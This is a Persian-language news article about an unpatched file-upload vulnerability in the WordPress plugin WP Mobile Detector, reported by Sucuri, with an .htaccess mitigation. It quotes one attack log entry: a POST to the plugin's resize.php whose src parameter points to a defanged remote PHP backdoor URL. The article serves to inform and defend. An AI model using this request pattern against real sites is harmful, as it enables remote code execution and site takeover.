loading...

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

آکاایران: ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

آکاایران: آسیب پذیری افزونه WP Mobile Detector

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند
کارشناسان امنیتی sucuri اعلام کرده اند، تعداد قابل توجهی از نصب های وردپرس ممکن است در معرض یک نقص امنیتی که به طور گسترده در افزونه ای به نام WP Mobile Detector وجود دارد، قرار دارا باشند. نقصی که بخش قابل توجهی از کاربران را در معرض تهدیدات سایبری قرار می دهد. اما خبر نگران کننده تر این است که با وجود شناسایی و مهم تر از آن انتشار این آسیب پذیری و احتمال این که مجرمان سایبری ممکن است به طرز گسترده ای از این نقص سوء استفاده کنند، هنوز هیچ وصله ای برای آن عرضه نشده است.

بنابر گزارش کارشناسان شرکت sucuri،  مجرمان سایبری از حفره موجود در آشکارساز موبایل WP (افزونه WP Mobile Detector) به منظور تزریق اسکریپت های هرزنامه ای که حاوی مطالب نه چندان جالب است، استفاده می کنند. بعد از شناسایی و افشای این آسیب پذیری، افزونه فوق از پوشه افزونه های وردپرس حذف گردید. در همین ارتباط شرکت sucuri گزارش کرده است: «تیم تحقیقاتی ما به طور تخصصی به برررسی این مسئله پرداخت و در نهایت کشف کرد که نقطه مشترک بسیاری از سایت های وردپرسی افزونه آشکارساز موبایل WP است. افزونه ای که با آپلود یک فایل اختیاری باعث به وجود آمدن آسیب پذیری روز صفر در تاریخ 31 می شده است. افزونه فوق از مخزن وردپرس حذف گردیده است اما هیچ وصله ای برای آن موجود نیست.» در حالی که این آسیب پذیری در روز 31 ماه می به طور عمومی انتشار یافت، اما گزارش هایی که توسط دیوارهای آتش به ثبت رسیده است، نشان می دهند که این حمله از تاریخ 27 می آغاز شده است. برآوردها نشان می دهند که این افزونه حداقل بیش از 10 هزار بار نصب شده و بخش عمده ای از نصب کنندگان در معرض حملات سایبری مبتنی بر این آسیب پذیری قرار دارند.

آسیب پذیری فوق چگونه عمل می کند؟

این نقص ناشی از عدم اعتبارسنجی موفقیت آمیز ورودی توسط این افزونه بوده که به هکرها اجازه می دهد کدهای مخرب php را به ورودی ها ارسال کنند. بهره برداری از این آسیب پذیری ساده بوده و تنها کاری که هکرها باید انجام دهند، ارسال یک درخواست برای resize.php یا timthumb.php ( بله timthump.php در این حالت تنها شامل resize.php خواهد بود.) همراه با یک آدرس URL که نقش یک درب پشتی را بازی می کند، درون پوشه افزونه است. قطعه کدی که در ادامه مشاهده می کنید، نمونه ای از بارگذاری داده ها در یک حمله سایبری را نشان می دهد

188.73.152.166 - - [31/May/2016:23:54:43 -0400] "POST /wp-content/plugins/wp-mobile-detector/resize.php

Payload:src=hxxp://copia[.]ru/mig/tmp/css.php"

Sucuri گفته است: «با توجه به این که هیچ گونه وصله ای برای این آسیب پذیری عرضه نشده است، در نتیجه کار عاقلانه ای است کاربران افزونه آشکارساز موبایلی wp را غیر فعال سازند. اما اگر واقعا به این افزونه نیاز دارید بهتر است یک وصله موقتی برای غیر فعال کردن اجرای php در زیرپوشه wp-mobile-detector/cache را مورد استفاده قرار دهید. به طور مثال، از قطعه کد زیر در فایل .htaccess file. استفاده کنید.

<Files *.php>

deny from all

</Files>

مدیران سایت های وردپرسی آلوده می توانند درخواست خود را برای بخش پشتیبانی شرکت Sucuri  ارسال کنند. 

===================================

شاید به این مطالب هم علاقمند باشید:

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

وب در سال 2016: سایت های واکنش گرا و آینده ای فاقد رقیب

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

CES 2016: توپ اسباب بازی که اصول پایه برنامه نویسی را به کودکان آموزش می دهد + تصویر

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

بهترین کتاب های رایگان آموزش برنامه نویسی وب 2015 + لینک دانلود

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

بهترین ابزارهای CSS مناسب برنامه نویسان وب

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

چهارده زبان برنامه نویسی برای شغل آینده شما

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

ساخت برنامه های ویندوز 10 فاقد یک خط کدنویسی

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

اینفوگرافی: انتخاب اولین زبان برنامه نویسی بر اساس زندگی که می خواهید

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

بازدید از این 8 سایت هوش تان را افزایش می دهد

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

برنامه نویسی بر فراز ابرها

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

انقلاب برنامه نویسی گرافیکی

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

قیام NoSQL ادامه دارد

ده هزار سایت وردپرسی در معرض حملات هکری قرار گرفتند

با این سایت زبان SQL را رایگان و کلاسیک بیاموزید

 

.

منبع : shabakeh-mag.com

تبلیغات